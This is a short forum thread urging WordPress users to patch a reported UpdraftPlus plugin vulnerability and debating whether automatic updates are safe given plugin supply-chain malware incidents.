Howdy all,
I just saw this pass by on one of my feeds and figured now is as good a time as any to remind everyone again to keep a close eye on security updates, now more than ever.
I know Updraft is a pretty popular plugin for WordPress, so if you’re using it…get on this, sounds potentially quite serious:
what are you recommendations on automatic updates?
for me
Using a real cron for WordPress makes these updates guaranteed and allows your site to run smoother without using the pseudo cron.
I’m hesitant to suggest any automatic updates now. There have been so many supply chain attacks…including WordPress plugins. e.g. there was the recent giant pile of WordPress plugins that were acquired and immediately injected with malware. So, an official upstream update included malware…if you updated immediately after those got released, you got popped.
I’m recommending:
I don’t like it, but things are getting hairy out there.
This is definitely the new meta and I had forgotten about it. WordPress Org should do something about this. I certainly will not be using that other plugin website or that fork of WordPress.
The WordPress folks have been doing stuff about it for years. They scan for known malware, etc. and they removed all of those plugins and banned the developer and rolled a repair patch with the next version of WordPress.
But, we live in dangerous times. Machines with only modest guidance can find and exploit software at rate far faster than humans can fix it.
Tell me about it.
Lock it down folks.
The internet never had enough controls before in my honest opinion, AI is just an unbridled demon stallion running free to cause untold havoc …
Flee.
David
Thanks, Joe. Good to know about this.